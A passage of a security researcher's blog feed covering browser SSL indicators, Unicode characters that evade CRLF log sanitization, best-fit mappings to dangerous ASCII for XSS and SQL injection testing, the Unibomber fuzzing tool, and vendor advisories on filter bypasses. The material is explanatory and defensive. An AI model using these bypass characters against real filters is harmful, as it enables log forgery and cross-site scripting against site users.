&lt;li&gt;Firefox 4&lt;/li&gt;&lt;br/&gt;	&lt;li&gt;Firefox 3&lt;/li&gt;&lt;br/&gt;	&lt;li&gt;Opera 11&lt;/li&gt;&lt;br/&gt;	&lt;li&gt;Safari 5&lt;/li&gt;&lt;br/&gt;	&lt;li&gt;Konqueror 4&lt;/li&gt;&lt;br/&gt;	&lt;li&gt;Chrome 11&lt;/li&gt;&lt;br/&gt;&lt;/ul&gt;&lt;br/&gt;Note that in the case of SSL connections which do contain errors, such as invalid host name or expired SSL certificate, the presentation changes, often significantly, to warn the end user that something bad is happening.  I'm not showing what those look like though.&lt;br/&gt;&lt;br/&gt;The following screenshots compare the display of a standard SSL certificateare only from valid, error-free SSL certificates and connections.  Summarized as a table:&lt;br/&gt;&lt;table style="width: 90%;"&gt;&lt;br/&gt;&lt;tbody&gt;&lt;br/&gt;&lt;tr style="color: black; font-color: white;"&gt;&lt;br/&gt;&lt;td&gt;&lt;span style="text-decoration: underline;"&gt;&lt;strong&gt;Browser&lt;/strong&gt;&lt;/span&gt;&lt;/td&gt;&lt;br/&gt;&lt;td&gt;&lt;strong&gt;&lt;span style="text-decoration: underline;"&gt;Standard SSL&lt;/span&gt;&lt;/strong&gt;&lt;/td&gt;&lt;br/&gt;&lt;td&gt;&lt;span style="text-decoration: underline;"&gt;&lt;strong&gt;EVSSL&lt;/strong&gt;&lt;/span&gt;&lt;/td&gt;&lt;br/&gt;&lt;/tr&gt;&lt;br/&gt;&lt;tr&gt;&lt;br/&gt;&lt;td&gt;Internet Explorer 9&lt;/td&gt;&lt;br/&gt;&lt;td&gt;Gray padlock in address bar&lt;/td&gt;&lt;br/&gt;&lt;td&gt;Gray padlock plus full &lt;span style="color: #339966;"&gt;green &lt;/span&gt;address bar with company name or CA&lt;/td&gt;&lt;br/&gt;&lt;/tr&gt;&lt;br/&gt;&lt;tr&gt;&lt;br/&gt;&lt;td&gt;Internet Explorer 8&lt;/td&gt;&lt;br/&gt;&lt;td&gt;&lt;span style="color: #ffff00;"&gt;Yellow &lt;/span&gt;padlock in address bar&lt;/td&gt;&lt;br/&gt;&lt;td&gt;&lt;span style="color: #ffff00;"&gt;Yellow &lt;/span&gt;padlock plus full &lt;span style="color: #339966;"&gt;green &lt;/span&gt;address bar with company name or CA&lt;/td&gt;&lt;br/&gt;&lt;/tr&gt;&lt;br/&gt;&lt;tr&gt;&lt;br/&gt;&lt;td&gt;Firefox 4&lt;/td&gt;&lt;br/&gt;&lt;td&gt;&lt;span style="color: #0000ff;"&gt;Blue &lt;/span&gt;security emblem in address bar&lt;/td&gt;&lt;br/&gt;&lt;td&gt;&lt;span style="color: #008000;"&gt;Green &lt;/span&gt;security emblem in address bar with company name&lt;/td&gt;&lt;br/&gt;&lt;/tr&gt;&lt;br/&gt;&lt;tr&gt;&lt;br/&gt;&lt;td&gt;Firefox 3&lt;/td&gt;&lt;br/&gt;&lt;td&gt;&lt;span style="color: #0000ff;"&gt;&lt;span style="color: #000000;"&gt;Padlock at bottom plus&lt;/span&gt; blue &lt;/span&gt;security emblem in address bar&lt;/td&gt;&lt;br/&gt;&lt;td&gt;Padlock at bottom plus &lt;span style="color: #339966;"&gt;green &lt;/span&gt;emblem in address bar with company name&lt;/td&gt;&lt;br/&gt;&lt;/tr&gt;&lt;br/&gt;&lt;tr&gt;&lt;br/&gt;&lt;td&gt;Chrome 11&lt;/td&gt;&lt;br/&gt;&lt;td&gt;&lt;span style="color: #339966;"&gt;Green &lt;/span&gt;padlock in address bar&lt;/td&gt;&lt;br/&gt;&lt;td&gt;&lt;span style="color: #339966;"&gt;Green &lt;/span&gt;padlock plus &lt;span style="color: #339966;"&gt;green &lt;/span&gt;emblem in address bar with company name&lt;/td&gt;&lt;br/&gt;&lt;/tr&gt;&lt;br/&gt;&lt;tr&gt;&lt;br/&gt;&lt;td&gt;Opera 11&lt;/td&gt;&lt;br/&gt;&lt;td&gt;Dark padlock plus &lt;span style="color: #ffff00;"&gt;yellow &lt;/span&gt;emblem in address bar written as "Secure"&lt;/td&gt;&lt;br/&gt;&lt;td&gt;Dark padlock plus &lt;span style="color: #339966;"&gt;green &lt;/span&gt;emblem in address bar written as "Trusted"&lt;/td&gt;&lt;br/&gt;&lt;/tr&gt;&lt;br/&gt;&lt;tr&gt;&lt;br/&gt;&lt;td&gt;Konqueror 4&lt;/td&gt;&lt;br/&gt;&lt;td&gt;&lt;span style="color: #339966;"&gt;Green &lt;/span&gt;shield with white check mark in address bar&lt;/td&gt;&lt;br/&gt;&lt;td&gt;&lt;span style="color: #339966;"&gt;Green &lt;/span&gt;shield with white check mark in address bar&lt;/td&gt;&lt;br/&gt;&lt;/tr&gt;&lt;br/&gt;&lt;tr&gt;&lt;br/&gt;&lt;td&gt;Safari 5&lt;/td&gt;&lt;br/&gt;&lt;td&gt;Gray padlock in address bar&lt;/td&gt;&lt;br/&gt;&lt;td&gt;Gray padlock plus green company name in address bar&lt;/td&gt;&lt;br/&gt;&lt;/tr&gt;&lt;br/&gt;&lt;/tbody&gt;&lt;br/&gt;&lt;/table&gt;&lt;br/&gt;For more information about how browsers handle SSL certificates see the &lt;a href="http://code.google.com/p/browsersec/wiki/Part2#Protocol-level_encryption_facilities"&gt;Browser Security Handbook&lt;/a&gt;.&lt;br/&gt;&lt;h2&gt;Internet Explorer 9&lt;/h2&gt;&lt;br/&gt;&amp;nbsp;&lt;br/&gt;&lt;br/&gt;&lt;a href="http://www.lookout.net/wp-content/uploads/2011/05/ie9.png"&gt;&lt;img class="alignnone size-full wp-image-522" title="IE9 displaying a basic SSL certificate and security connection" src="http://www.lookout.net/wp-content/uploads/2011/05/ie9.png" alt="IE9 displaying a basic SSL certificate and security connection" width="845" height="715" /&gt;&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;With the basic SSL certificate above you can see a small, almost discreet, gray padlock icon in the right hand side of the address bar.  There are no other visual signs.&lt;br/&gt;&lt;br/&gt;&lt;a href="http://www.lookout.net/wp-content/uploads/2011/05/ie9-evssl.png"&gt;&lt;img class="alignnone size-full wp-image-523" title="IE9 displaying an EVSSL certificate and security connection" src="http://www.lookout.net/wp-content/uploads/2011/05/ie9-evssl.png" alt="IE9 displaying an EVSSL certificate and security connection" width="845" height="715" /&gt;&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;With an EVSSL certificate the same padlock exists but the entire address bar is also colored green.&lt;br/&gt;&lt;h2&gt;Internet Explorer 8&lt;/h2&gt;&lt;br/&gt;&lt;a href="http://www.lookout.net/wp-content/uploads/2011/05/ie8.png"&gt;&lt;img class="alignnone size-full wp-image-522" title="IE8 displaying a basic SSL certificate and security connection" src="http://www.lookout.net/wp-content/uploads/2011/05/ie8.png" alt="IE8 displaying a basic SSL certificate and security connection" width="845" height="715" /&gt;&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;With the standard SSL certificate above there's a colored padlock displayed on the area to the right of the address bar.&lt;br/&gt;&lt;br/&gt;&lt;a href="http://www.lookout.net/wp-content/uploads/2011/05/ie8-evssl.png"&gt;&lt;img class="alignnone size-full wp-image-523" title="IE8 displaying an EVSSL certificate and security connection" src="http://www.lookout.net/wp-content/uploads/2011/05/ie8-evssl.png" alt="IE8 displaying an EVSSL certificate and security connection" width="845" height="715" /&gt;&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;With an EVSSL certificate above there's the same colored padlock displayed along with identify information plus the entire address bar is colored green.&lt;br/&gt;&lt;h2&gt;Firefox 4&lt;/h2&gt;&lt;br/&gt;&amp;nbsp;&lt;br/&gt;&lt;br/&gt;&lt;a href="http://www.lookout.net/wp-content/uploads/2011/05/ff4.png"&gt;&lt;img class="alignnone size-full wp-image-523" title="FF4 displaying a standard certificate and security connection" src="http://www.lookout.net/wp-content/uploads/2011/05/ff4.png" alt="FF4 displaying a standard certificate and security connection" width="842" height="701" /&gt;&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;With a standard certificate above there's no padlock displayed anywhere, but there is an informational emblem displayed between the favicon and the URL in the address bar.  It's standard color is blue for any site so this is not meant to look branded to Facebook even though it happens to be using the same colors.&lt;br/&gt;&lt;br/&gt;&lt;a href="http://www.lookout.net/wp-content/uploads/2011/05/ff4-evssl.png"&gt;&lt;img class="alignnone size-full wp-image-523" title="FF4 displaying an EVSSL certificate and security connection" src="http://www.lookout.net/wp-content/uploads/2011/05/ff4-evssl.png" alt="FF4 displaying an EVSSL certificate and security connection" width="842" height="701" /&gt;&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;With an EVSSL certificate above there's no padlock displayed anywhere, but there is an informational emblem displayed between the favicon and the URL in the address bar.  It's colored green.&lt;br/&gt;&lt;br/&gt;&lt;a href="http://www.lookout.net/wp-content/uploads/2011/05/ff4-google.png"&gt;&lt;img class="alignnone size-full wp-image-523" title="FF4 displaying an EVSSL certificate and security connection" src="http://www.lookout.net/wp-content/uploads/2011/05/ff4-google.png" alt="FF4 displaying an EVSSL certificate and security connection" width="842" height="701" /&gt;&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;The above shot of https://encrypted.google.com is just to emphasize that the security emblem has a standard blue color.&lt;br/&gt;&lt;h2&gt;Firefox 3&lt;/h2&gt;&lt;br/&gt;&amp;nbsp;&lt;br/&gt;&lt;br/&gt;&lt;a href="http://www.lookout.net/wp-content/uploads/2011/05/ff3-ubuntu.png"&gt;&lt;img class="alignnone size-full wp-image-523" title="ff3 displaying a standard certificate and security connection" src="http://www.lookout.net/wp-content/uploads/2011/05/ff3-ubuntu.png" alt="ff3 displaying a standard SSL certificate and security connection" /&gt;&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;With standard certificate above there's a padlock displayed in the bottom right, and an informational blue-colored emblem displayed between the favicon and the URL in the address bar.&lt;br/&gt;&lt;br/&gt;&lt;a href="http://www.lookout.net/wp-content/uploads/2011/05/ff3-evssl-ubuntu.png"&gt;&lt;img class="alignnone size-full wp-image-523" title="FF3 displaying an EVSSL certificate and security connection" src="http://www.lookout.net/wp-content/uploads/2011/05/ff3-evssl-ubuntu.png" alt="FF3 displaying an EVSSL certificate and security connection" /&gt;&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;With an EVSSL certificate above there's a padlock displayed in the bottom right, and an informational green-colored emblem displayed between the favicon and the URL in the address bar.&lt;br/&gt;&lt;h2&gt;Google Chrome 11&lt;/h2&gt;&lt;br/&gt;&lt;a href="http://www.lookout.net/wp-content/uploads/2011/05/chrome11.png"&gt;&lt;img class="alignnone size-full wp-image-522" title="Chrome 11 displaying a basic SSL certificate and security connection" src="http://www.lookout.net/wp-content/uploads/2011/05/chrome11.png" alt="Chrome 11 displaying a basic SSL certificate and security connection" width="845" height="715" /&gt;&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;With a standard certificate above there's a small green padlock displayed in the left-hand side of the address bar.&lt;br/&gt;&lt;br/&gt;&lt;a href="http://www.lookout.net/wp-content/uploads/2011/05/chrome11-evssl.png"&gt;&lt;img class="alignnone size-full wp-image-522" title="Chrome 11 displaying an EVSSL certificate and security connection" src="http://www.lookout.net/wp-content/uploads/2011/05/chrome11-evssl.png" alt="Chrome 11 displaying an EVSSL certificate and security connection" width="845" height="715" /&gt;&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;With an EVSSL certificate above there's a small green padlock displayed in the left-hand side of the address bar along with a green-colored informational emblem.&lt;br/&gt;&lt;h2&gt;Opera 11&lt;/h2&gt;&lt;br/&gt;&lt;a href="http://www.lookout.net/wp-content/uploads/2011/05/opera11.png"&gt;&lt;img class="alignnone size-full wp-image-522" title="Opera 11 displaying a basic SSL certificate and security connection" src="http://www.lookout.net/wp-content/uploads/2011/05/opera11.png" alt="Opera 11  displaying a basic SSL certificate and security connection" width="845" height="715" /&gt;&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;With  a standard certificate above there's a small dark padlock displayed in the left-hand side of the address bar along with a yellow-colored "Secure" emblem.&lt;br/&gt;&lt;br/&gt;&lt;a href="http://www.lookout.net/wp-content/uploads/2011/05/opera11-evssl.png"&gt;&lt;img class="alignnone size-full wp-image-522" title="Opera 11  displaying am EVSSL certificate and security connection" src="http://www.lookout.net/wp-content/uploads/2011/05/opera11-evssl.png" alt="Opera 11  displaying am EVSSL certificate and security connection" width="845" height="715" /&gt;&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;With  an EVSSL certificate above there's a small dark padlock displayed in the left-hand side of the address bar along with a green-colored "Trusted" emblem.&lt;br/&gt;&lt;h2&gt;Konqueror 4&lt;/h2&gt;&lt;br/&gt;&lt;a href="http://www.lookout.net/wp-content/uploads/2011/05/konqueror4-ubuntu.png"&gt;&lt;img class="alignnone size-full wp-image-522" title="Konqueror 4 displaying a basic SSL certificate and security connection" src="http://www.lookout.net/wp-content/uploads/2011/05/konqueror4-ubuntu.png" alt="Konqueror 4 displaying a basic SSL certificate and security connection" width="845" height="715" /&gt;&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;With  a standard certificate above there's a small green shield with a white check mark in the right-hand side of the address bar.&lt;br/&gt;&lt;br/&gt;&lt;a href="http://www.lookout.net/wp-content/uploads/2011/05/konqueror4-evssl-ubuntu.png"&gt;&lt;img class="alignnone size-full wp-image-522" title="Konqueror 4 displaying an EVSSL certificate and security connection" src="http://www.lookout.net/wp-content/uploads/2011/05/konqueror4-evssl-ubuntu.png" alt="Konqueror 4 displaying an EVSSL certificate and security connection" /&gt;&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;With  an EVSSL certificate above there's the same small green shield with a white check mark in the right-hand side of the address bar.&lt;br/&gt;&lt;h2&gt;Safari 5&lt;/h2&gt;&lt;br/&gt;&lt;a href="http://www.lookout.net/wp-content/uploads/2011/05/safar5.png"&gt;&lt;img class="alignnone size-full wp-image-522" title="Safari displaying a basic SSL certificate and security connection" src="http://www.lookout.net/wp-content/uploads/2011/05/safar5.png" alt="IE9 displaying a basic SSL certificate and security connection" width="845" height="715" /&gt;&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;With  a standard certificate above there's a small gray padlock in the right-hand side of the address bar.&lt;br/&gt;&lt;br/&gt;&lt;a href="http://www.lookout.net/wp-content/uploads/2011/05/safari5-evssl.png"&gt;&lt;img class="alignnone size-full wp-image-522" title="Safari 5 displaying an EVSSL certificate and security connection" src="http://www.lookout.net/wp-content/uploads/2011/05/safari5-evssl.png" alt="Safari 5displaying a basic SSL certificate and security connection" width="845" height="715" /&gt;&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;With  an EVSSL certificate above there's a small gray padlock in the right-hand side of the address bar.&lt;br/&gt;&lt;br/&gt;&lt;a href="http://www.lookout.net/wp-content/uploads/2011/05/safari5-error.png"&gt;&lt;img class="alignnone size-full wp-image-522" title="Safari displaying an SSL certificate with errors" src="http://www.lookout.net/wp-content/uploads/2011/05/safari5-error.png" alt="Safari 5displaying an EVSSL certificate and security connection" width="845" height="715" /&gt;&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;Just couldn't resist putting in a shot of a standard certificate with errors (host name does not match).&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3867003125940558889-3606848082126858505?l=web.lookout.net' alt='' /&gt;&lt;/div&gt;</description><link>http://web.lookout.net/2011/05/how-web-browsers-display-standard-ssl.html</link><author>noreply@blogger.com (Chris Weber)</author><thr:total>1</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-3867003125940558889.post-435767834116842847</guid><pubDate>Wed, 11 May 2011 16:04:00 +0000</pubDate><atom:updated>2012-01-16T17:15:44.769-08:00</atom:updated><category domain='http://www.blogger.com/atom/ns#'>security</category><category domain='http://www.blogger.com/atom/ns#'>Unicode</category><title>Injecting new line characters (e.g. CR LF) into security logs with
Unicode</title><description>Today I was asked if ESAPI's approach to sanitizing log messages for CRLF (carriage return, line feed) injection was sound.   "CRLF Injection" in this case describes an attack whereby textual content such as records in a security log can be forged.  Imagine if a plain text security log file separates log entries with two CRLF sequences.  I'm using plain text here to keep it simple, but hopefully real logs would be using some form of markup.  In hex this would look like 0x0D 0x0A 0x0D 0x0A.  If the input validation routines did not sanitize CR LF characters then an attacker could manipulate their input to create what appeared to be new records in the log.  Here's a snippet from ESAPI which attempts to protect against this:&lt;br/&gt;&lt;br/&gt;&lt;code&gt; // ensure no CRLF injection into logs for forging records&lt;/code&gt;&lt;br/&gt;&lt;code&gt;String clean = message.replace('\n', '_').replace('\r', '_');&lt;br/&gt;if (ESAPI.securityConfiguration().getLogEncodingRequired()) {&lt;br/&gt;clean = ESAPI.encoder().encodeForHTML(message);&lt;br/&gt;if (!message.equals(clean)) {&lt;br/&gt;clean += " (Encoded)";&lt;br/&gt;}&lt;br/&gt;&lt;/code&gt;&lt;code&gt;}&lt;/code&gt;&lt;br/&gt;&lt;br/&gt;&lt;strong&gt;Note:&lt;/strong&gt;I have never worked with or tested ESAPI.  I don't know what actions the methods &lt;code&gt;getLogEncodingRequired()&lt;/code&gt; and &lt;code&gt;encodeForHTML(message)&lt;/code&gt; perform, so I don't know at all if ESAPI would be vulnerable to the attacks I'm about to describe.  Maybe someone from ESAPI can jump in.  I'm only using ESAPI to make the example more realistic.&lt;br/&gt;&lt;br/&gt;ESAPI is concerned with the visual (human-readable) appearance of log entries here and not how software processes the characters in those entries.  There seem to be three vectors that would screw up ESAPIs logic for protecting against CRLF injection:&lt;br/&gt;&lt;ol&gt;&lt;br/&gt;	&lt;li&gt;Unicode normalization that decomposes and maps a character (or set of) to either a CR or an LF&lt;br/&gt;&lt;strong&gt;* Not a problem.&lt;/strong&gt;&lt;/li&gt;&lt;br/&gt;	&lt;li&gt;&lt;strong&gt;&lt;/strong&gt;Charset best-fit mappings that map input characters to either CR or LF during transcoding&lt;br/&gt;&lt;strong&gt;* Unpredictable problem.&lt;/strong&gt;&lt;/li&gt;&lt;br/&gt;	&lt;li&gt;&lt;strong&gt;&lt;/strong&gt;Unicode characters that provide the same visual effect as CR and LF&lt;br/&gt;&lt;strong&gt;* Definitely a problem.&lt;/strong&gt;&lt;/li&gt;&lt;br/&gt;&lt;/ol&gt;&lt;br/&gt;#1 you don’t have to worry about it.  The four Unicode normalization forms do not map any characters to CR  or LF.&lt;br/&gt;&lt;br/&gt;#2 Best-fits are tough to predict, because they can differ per platform.  Below are the set of characters I know that will best-fit map to either U+000A (LF) or U+000D (CR) in the given charset (e.g. CP424).&lt;br/&gt;&lt;br/&gt;&lt;code&gt;000A	008E	#REPEAT	CP424&lt;br/&gt;000A	25D9	--		IBMGRAPH&lt;br/&gt;000A	008E	#CONTROL	CP037&lt;br/&gt;000A	008E	#CONTROL	CP1026&lt;br/&gt;000A	008E	#CONTROL	CP500&lt;br/&gt;000A	008E	#CONTROL	CP875&lt;br/&gt;000A	2326	# ERASE TO THE RIGHT # Delete right (right-to-left text)	KEYBOARD&lt;br/&gt;000D	266A	02	IBMGRAPH&lt;br/&gt;&lt;/code&gt;&lt;br/&gt;&lt;br/&gt;#3 Here is the most practical and most obvious attack.  Each of the following Unicode characters (code points) will create a visual “new line” effect.&lt;br/&gt;&lt;br/&gt;&lt;code&gt;U+000A  LINE FEED (LF)&lt;br/&gt;U+000B  LINE TABULATION&lt;br/&gt;U+000D  CARRIAGE RETURN (CR)&lt;br/&gt;U+000C  FORM FEED (FF)&lt;br/&gt;U+0085  NEXT LINE (NEL)&lt;br/&gt;U+2028 LINE SEPARATOR&lt;br/&gt;U+2029 PARAGRAPH SEPARATOR&lt;br/&gt;&lt;/code&gt;&lt;br/&gt;&lt;br/&gt;Meaning ESAPI should be filtering out all of these as well if it plans to handle Unicode input.&lt;br/&gt;&lt;br/&gt;Of course there’s a #4 I didn’t mention – concerning the target locale and character encoding of the logs.&lt;br/&gt;&lt;br/&gt;I assume this ESAPI function is concerned with logs written to using Latin characters in a Western locale.  I tend to agree that blacklisting is not the best answer but sometimes it makes sense and works.  If the logs are written out in plain text encoded with UTF-8 or other Unicode encoding then #3 above would be a problem.&lt;br/&gt;&lt;br/&gt;Isn’t the whacky world of Unicode and internationalization fun?&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3867003125940558889-435767834116842847?l=web.lookout.net' alt='' /&gt;&lt;/div&gt;</description><link>http://web.lookout.net/2011/05/injecting-new-line-characters-eg-cr-lf.html</link><author>noreply@blogger.com (Chris Weber)</author><thr:total>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-3867003125940558889.post-4055934862863483905</guid><pubDate>Mon, 20 Dec 2010 11:05:00 +0000</pubDate><atom:updated>2012-01-16T17:15:44.750-08:00</atom:updated><category domain='http://www.blogger.com/atom/ns#'>sql injection</category><category domain='http://www.blogger.com/atom/ns#'>best-fit</category><category domain='http://www.blogger.com/atom/ns#'>XSS</category><category domain='http://www.blogger.com/atom/ns#'>testing</category><category domain='http://www.blogger.com/atom/ns#'>Unicode</category><title>List of characters for testing Unicode transformations and best-fit
mapping to dangerous ASCII</title><description>I'm attaching two CSV files for use in test cases and tools.  The uni2asc.csv contains all of the Unicode characters that map to something ASCII &amp;lt; 0x80.  The bestfit.csv  contains all of the known best-fit  mappings to dangerous ASCII between legacy charsets and Unicode.&lt;br/&gt;&lt;br/&gt;&lt;a href="http://www.lookout.net/wp-content/uploads/2010/12/uni2asc.csv"&gt;uni2asc.csv&lt;/a&gt; - for straight Unicode to Unicode mappings&lt;br/&gt;&lt;a href="http://www.lookout.net/wp-content/uploads/2010/12/bestfit.csv"&gt;bestfit.csv&lt;/a&gt; - for legacy charset to Unicode mappings&lt;br/&gt;&lt;br/&gt;&lt;span style="color: #000000;"&gt;I gave these to Gareth so they may wind up in &lt;a href="http://hackvertor.co.uk/public"&gt;HackVertor&lt;/a&gt;. &lt;/span&gt;&lt;br/&gt;&lt;br/&gt;The Unicode database contains meta data about every character, including compatibility mappings, normalization mappings, case mappings, and other decomposition data.  It's useful for testing to know what special Unicode characters may transform to dangerous ASCII.  For example:&lt;br/&gt;&lt;ul&gt;&lt;br/&gt;	&lt;li&gt;U+2134 SCRIPT SMALL O character will transform to the U+006F LATIN SMALL LETTER in certain cases&lt;/li&gt;&lt;br/&gt;&lt;/ul&gt;&lt;br/&gt;Of course, if you're testing for SQL injection or XSS you probably want to know what transforms to dangerous characters like ' and &amp;lt;.  We attempted to automate some of this in our &lt;a href="http://xss.codeplex.com/"&gt;x5s tool&lt;/a&gt; which has done a good job so far, and we have a big update for that coming soon.&lt;br/&gt;&lt;br/&gt;In the bestfit.csv file you'll find all of best-fit mappings from Unicode to dangerous ASCII &amp;lt; 0x80 (and vice versa) in many of the legacy charsets from &lt;a href="http://unicode.org/Public/MAPPINGS/"&gt;http://unicode.org/Public/MAPPINGS/&lt;/a&gt;.  There's some wild legacy stuff in here.  For example:&lt;br/&gt;&lt;ul&gt;&lt;br/&gt;	&lt;li&gt;&lt;br/&gt;&lt;div id="_mcePaste"&gt;In APL-ISO-IR-68, 0x27 maps to 0x5D in Unicode, and vice versa.&lt;/div&gt;&lt;/li&gt;&lt;br/&gt;&lt;/ul&gt;&lt;br/&gt;If you put these to use anywhere please let me know so I can pass the word along.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3867003125940558889-4055934862863483905?l=web.lookout.net' alt='' /&gt;&lt;/div&gt;</description><link>http://web.lookout.net/2010/12/list-of-characters-for-testing-unicode.html</link><author>noreply@blogger.com (Chris Weber)</author><thr:total>1</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-3867003125940558889.post-5914398733817312479</guid><pubDate>Wed, 18 Nov 2009 21:50:00 +0000</pubDate><atom:updated>2012-01-16T17:15:44.821-08:00</atom:updated><category domain='http://www.blogger.com/atom/ns#'>IDN</category><category domain='http://www.blogger.com/atom/ns#'>advisory</category><category domain='http://www.blogger.com/atom/ns#'>fuzzing</category><category domain='http://www.blogger.com/atom/ns#'>Opera</category><title>Advisory: Certain domain names could allow execution of arbitrary code
in Opera</title><description>Opera released 10.01 recently, which fixed a memory corruption issue found with Casaba’s IDN/URI fuzzer.&lt;br/&gt;&lt;br/&gt;&lt;a href="http://www.opera.com/support/kb/view/938/"&gt;http://www.opera.com/support/kb/view/938/&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3867003125940558889-5914398733817312479?l=web.lookout.net' alt='' /&gt;&lt;/div&gt;</description><link>http://web.lookout.net/2009/11/advisory-certain-domain-names-could.html</link><author>noreply@blogger.com (Chris Weber)</author><thr:total>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-3867003125940558889.post-5590090167740145181</guid><pubDate>Mon, 27 Jul 2009 21:47:00 +0000</pubDate><atom:updated>2012-01-16T17:15:44.797-08:00</atom:updated><category domain='http://www.blogger.com/atom/ns#'>tools</category><category domain='http://www.blogger.com/atom/ns#'>XSS</category><category domain='http://www.blogger.com/atom/ns#'>testing</category><title>Unibomber tool for specialized XSS testing</title><description>At Black Hat I’m planning to demo a new tool we’ve been putting together at &lt;a href="http://www.casabasecurity.com"&gt;Casaba Security&lt;/a&gt;. It’s mostly a brute force input testing tool right now, aimed at finding cross-site scripting (XSS) bugs but with a unique set of techniques. It automates the testing process greatly, by auto-injecting a canary and ID into each input be it query string, HTTP header, or POST parameter.&lt;br/&gt;&lt;br/&gt;It basically bombs a Web-app with a slew of Unicode characters to find XSS bugs – hence the name – &lt;strong&gt;Unibomber&lt;/strong&gt;.&lt;br/&gt;&lt;br/&gt;Appended to the canary is a special character – special because it can transform into a ‘dangerous’ character through normalization, casing, or best-fit mapping operations. So we end up injecting these special characters all over the place and then detecting where they get transformed and displayed as output.&lt;br/&gt;&lt;br/&gt;The beauty is that we can find both reflected and persistent XSS bugs this way. It’s not a one-click tool though, this is intended rather for an experienced person, who knows how to find and exploit an XSS bug. The Unibomber assists the pen-tester by automating input-injection and ‘output encoding’ detection to find the vulnerability hotspots.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3867003125940558889-5590090167740145181?l=web.lookout.net' alt='' /&gt;&lt;/div&gt;</description><link>http://web.lookout.net/2009/07/unibomber-tool-for-specialized-xss.html</link><author>noreply@blogger.com (Chris Weber)</author><thr:total>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-3867003125940558889.post-6633995309537574606</guid><pubDate>Mon, 08 Jun 2009 21:46:00 +0000</pubDate><atom:updated>2012-01-16T17:15:44.838-08:00</atom:updated><category domain='http://www.blogger.com/atom/ns#'>advisory</category><category domain='http://www.blogger.com/atom/ns#'>Webkit</category><title>Advisory: Webkit – Visiting a maliciously crafted website may lead to a
cross-site scripting attack</title><description>More from: &lt;a href="http://support.apple.com/kb/HT3613"&gt;http://support.apple.com/kb/HT3613&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;CVE-ID: CVE-2006-2783&lt;br/&gt;&lt;br/&gt;Available for: Mac OS X v10.4.11, Mac OS X Server v10.4.11, Mac OS X v10.5.7, Mac OS X Server v10.5.7, Windows XP or Vista&lt;br/&gt;&lt;br/&gt;Impact: Visiting a maliciously crafted website may lead to a cross-site scripting attack&lt;br/&gt;&lt;br/&gt;Description: WebKit ignores Unicode byte order mark sequences when parsing web pages. Certain websites and web content filters attempt to sanitize input by blocking specific HTML tags. This approach to filtering may be bypassed and lead to cross-site scripting when encountering maliciously-crafted HTML tags containing byte order mark sequences. This update addresses the issue through improved handling of byte order mark sequences. Credit to Chris Weber of Casaba Security, LLC for reporting this issue.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3867003125940558889-6633995309537574606?l=web.lookout.net' alt='' /&gt;&lt;/div&gt;</description><link>http://web.lookout.net/2009/06/advisory-webkit-visiting-maliciously.html</link><author>noreply@blogger.com (Chris Weber)</author><thr:total>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-3867003125940558889.post-4299647340174693096</guid><pubDate>Mon, 08 Jun 2009 21:20:00 +0000</pubDate><atom:updated>2012-01-16T17:15:44.761-08:00</atom:updated><category domain='http://www.blogger.com/atom/ns#'>advisory</category><category domain='http://www.blogger.com/atom/ns#'>ICU</category><title>Advisory: International Components for Unicode – Maliciously crafted
content may bypass website filters and result in cross-site scripting</title><description>Update from: &lt;a href="http://support.apple.com/kb/HT3613"&gt;http://support.apple.com/kb/HT3613&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;CVE-ID: CVE-2009-0153&lt;br/&gt;&lt;br/&gt;Available for: Windows XP or Vista&lt;br/&gt;&lt;br/&gt;Impact: Maliciously crafted content may bypass website filters and result in cross-site scripting&lt;br/&gt;&lt;br/&gt;Description: An implementation issue exists in ICU’s handling of certain character encodings. Using ICU to convert invalid byte sequences to Unicode may result in over-consumption, where trailing bytes are considered part of the original character. This may be leveraged by an attacker to bypass filters on websites that attempt to mitigate cross-site scripting. This update addresses the issue through improved handling of invalid byte sequences. For Mac OS X v10.5 systems, this issue is addressed in Mac OS X v10.5.7. Credit to Chris Weber of Casaba Security for reporting this issue.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/3867003125940558889-4299647340174693096?l=web.lookout.net' alt='' /&gt;&lt;/div&gt;</description><link>http://web.lookout.net/2009/06/advisory-international-components-for.html</link><author>noreply@blogger.com (Chris Weber)</author><thr:total>0</thr:total></item><item><guid isPermaLink='false'>tag:blogger.com,1999:blog-3867003125940558889.post-8523189811117200236</guid><pubDate>Sat, 23 May 2009 21:19:00 